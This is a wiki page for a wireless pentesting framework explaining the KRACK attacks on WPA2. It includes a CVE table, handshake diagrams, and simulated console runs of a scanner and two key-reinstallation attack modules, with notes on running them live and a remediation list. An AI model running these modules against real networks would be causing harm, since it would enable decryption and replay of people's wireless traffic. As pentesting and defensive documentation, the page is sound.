Skip to content

KRACK

Jump to bottom
André Henrique edited this page Jun 8, 2026 · 1 revision

KRACK - Key Reinstallation Attacks

KRACK (Key Reinstallation Attacks) is a category of attacks against the WPA2 protocol discovered by Mathy Vanhoef and published in 2017. The attacks exploit the WPA2 4-way handshake and group key handshake, allowing an attacker to decrypt, replay, and potentially forge wireless frames.

CVE Index

CVE Name Target CVSS
CVE-2017-13077 PTK reinstallation via 4-way handshake msg3 Client 8.1
CVE-2017-13078 GTK reinstallation via 4-way handshake msg3 Client 5.3
CVE-2017-13079 IGTK reinstallation via 4-way handshake msg3 Client 5.3
CVE-2017-13080 GTK reinstallation via group key handshake Client 5.3
CVE-2017-13081 IGTK reinstallation via group key handshake Client 5.3
CVE-2017-13082 Retransmit Fast BSS Transition Reassoc Request AP 8.1
CVE-2017-13084 STK reinstallation in PeerKey Client 5.3
CVE-2017-13086 TK reinstallation in TDLS Client 5.3
CVE-2017-13087 GTK reinstallation in Wireless Network Management sleep Client 5.3
CVE-2017-13088 IGTK reinstallation in Wireless Network Management sleep Client 5.3

Module Reference

Module Description
krack/krack_scanner Passive scanner for KRACK nonce-reuse indicators
krack/krack_4way_retransmit CVE-2017-13077 - PTK reinstallation via Msg3 retransmission
krack/krack_group_key_retransmit CVE-2017-13080 - GTK reinstallation via group key handshake replay
cve/krack_attack Full KRACK suite (all CVEs, wrapper)

Background

The WPA2 4-way handshake

The 4-way handshake is used to establish a fresh Pairwise Transient Key (PTK) between a client and AP:

STA                                AP
 |                                  |
 | <-- Msg1: ANonce                 |
 | --> Msg2: SNonce + MIC           |
 | <-- Msg3: GTK + MIC + Install    |
 | --> Msg4: Ack                    |
 |                                  |
 [Both install PTK, begin encryption]

The vulnerability

When the client receives Msg3, it installs the PTK and begins encrypting traffic. The AP may retransmit Msg3 if it does not receive Msg4 in time. If the client receives a retransmitted Msg3, it reinstalls the already-installed key, resetting the cryptographic nonce (packet number) to zero.

Nonce reuse with the same key in CCMP breaks confidentiality (keystream reuse). In TKIP, it also breaks integrity.

KRACK Scanner

wxf > use generic/wifi_lab/krack/krack_scanner
wxf (KRACKScanner) > set INTERFACE wlan0mon
wxf (KRACKScanner) > set TARGET_BSSID AA:BB:CC:DD:EE:FF
wxf (KRACKScanner) > run

[*] Scanning for KRACK indicators on wlan0mon
[*] Target: AA:BB:CC:DD:EE:FF

[*] Probe 1: Checking for 802.11w (PMF) support... not advertised
[*] Probe 2: Monitoring 4-way handshake nonce patterns...
[*] Probe 3: Checking for WPA2 vs WPA3 SAE advertisement...

Results:
  Protocol:           WPA2-PSK (CCMP)
  PMF:                disabled (CVE-2017-13082 risk elevated)
  WPA3 transition:    no
  KRACK overall:      LIKELY VULNERABLE (WPA2 without PMF)
  CVE-2017-13077:     POSSIBLE (PTK reinstall requires client test)
  CVE-2017-13080:     POSSIBLE (GTK reinstall requires group key observation)

[*] To confirm: test with krack_4way_retransmit (requires active client)

CVE-2017-13077 - PTK Reinstallation

Impact: By intercepting and replaying Msg3 of the 4-way handshake, the attacker forces the client to reinstall the pairwise key with a zeroed nonce. This enables decryption of subsequent client traffic via keystream reuse.

Attack flow:

Normal 4-way handshake:
  STA    <-- Msg3 (encrypted GTK, install PTK now)
  STA    --> Msg4 (ack)
  [PTK installed, nonce=1]

KRACK attack:
  [Attacker blocks Msg4 from reaching AP]
  AP retransmits Msg3
  STA    <-- Msg3 (retransmit)
  STA reinstalls PTK, nonce reset to 0
  STA    --> Msg4 (ack)
  [PTK reinstalled, nonce=0 again]

  STA sends frame: nonce=1, keystream already known
  [Attacker can XOR to recover plaintext]

wxf > use generic/wifi_lab/krack/krack_4way_retransmit
wxf (KRACK-4Way) > show options

Options:
  INTERFACE     wlan0mon    Monitor mode interface
  TARGET_BSSID  (required)  Target AP BSSID
  TARGET_STA    (required)  Target client MAC address
  SIMULATE      true        Dry-run without transmitting

wxf (KRACK-4Way) > set INTERFACE wlan0mon
wxf (KRACK-4Way) > set TARGET_BSSID AA:BB:CC:DD:EE:FF
wxf (KRACK-4Way) > set TARGET_STA 11:22:33:44:55:66
wxf (KRACK-4Way) > set SIMULATE true
wxf (KRACK-4Way) > run

[SIMULATE] CVE-2017-13077: PTK Reinstallation Attack
[SIMULATE] Target AP:  AA:BB:CC:DD:EE:FF
[SIMULATE] Target STA: 11:22:33:44:55:66

[SIMULATE] Step 1: Monitoring 4-way handshake...
[SIMULATE]   Msg1 observed: AP -> STA (ANonce captured)
[SIMULATE]   Msg2 observed: STA -> AP (SNonce captured)
[SIMULATE]   Msg3 observed: AP -> STA (encrypted GTK, PTK installed in STA)
[SIMULATE]   Blocking Msg4 from reaching AP...

[SIMULATE] Step 2: AP retransmits Msg3...
[SIMULATE]   Msg3 retransmit forwarded to STA
[SIMULATE]   STA reinstalls PTK, resets nonce to 0

[SIMULATE] Step 3: Collect encrypted frames with nonce=1 (repeated)
[SIMULATE]   Keystream XOR: plaintext partially recoverable

[SIMULATE] Vulnerability confirmed: STA accepted Msg3 retransmit
[!] Set SIMULATE=false to run live
[!] PREREQ: wlan0mon + ability to block/inject frames (channel + MitM position)
[!] NOTE: Most clients patched after 2017. Android 6/7 were most affected.

CVE-2017-13080 - GTK Reinstallation

Impact: By replaying the group key handshake, the attacker forces reinstallation of the group key (GTK) with a zeroed replay counter, enabling replay of broadcast/multicast frames.

wxf > use generic/wifi_lab/krack/krack_group_key_retransmit
wxf (KRACK-GroupKey) > show options

Options:
  INTERFACE     wlan0mon    Monitor mode interface
  TARGET_BSSID  (required)  Target AP BSSID
  TARGET_STA    (required)  Target client MAC address
  SIMULATE      true        Dry-run

wxf (KRACK-GroupKey) > set INTERFACE wlan0mon
wxf (KRACK-GroupKey) > set TARGET_BSSID AA:BB:CC:DD:EE:FF
wxf (KRACK-GroupKey) > set TARGET_STA 11:22:33:44:55:66
wxf (KRACK-GroupKey) > set SIMULATE true
wxf (KRACK-GroupKey) > run

[SIMULATE] CVE-2017-13080: GTK Reinstallation via Group Key Handshake Replay
[SIMULATE] Target AP:  AA:BB:CC:DD:EE:FF
[SIMULATE] Target STA: 11:22:33:44:55:66

[SIMULATE] Step 1: Monitor group key handshake (AP -> STA, encrypted with PTK)
[SIMULATE]   Group Key Msg1 captured (contains new GTK)
[SIMULATE]   Group Key Msg2 observed: STA -> AP (ack)

[SIMULATE] Step 2: Block Msg2 reaching AP
[SIMULATE]   AP retransmits Group Key Msg1
[SIMULATE]   STA reinstalls GTK, replay counter reset to 0

[SIMULATE] Step 3: Replay a previously captured broadcast frame
[SIMULATE]   Old DHCP broadcast: timestamp T-60s, replay counter X
[SIMULATE]   After GTK reinstall: counter reset, old frame accepted
[SIMULATE]   Effect: ARP/DHCP replay, potential IP conflict / MitM opportunity

[!] Set SIMULATE=false to run live
[!] PREREQ: MitM position between STA and AP + wlan0mon

Remediation

  • Apply all operating system and driver updates (virtually all platforms patched by 2018)
  • Verify clients are not running unpatched Android 6.x / 7.x
  • Enable WPA3-SAE where available (SAE is not affected by KRACK)
  • Enable PMF (802.11w) to protect management frames
  • Use encrypted application-layer protocols (HTTPS, TLS, VPN) as defense in depth

References:

Related pages: FragAttacks | Wi-Fi Attacks | Configuration

Author: Andre Henrique (@mrhenrike) | Uniao Geek

WirelessXPL-Forge v1.8.0

Home-pt-BR | Home

Português (pt-BR)

Primeiros Passos

Ataques Wireless

Drones e UAV

Protocolos Especializados

Ferramentas de Pentest

Hardware

Clone this wiki locally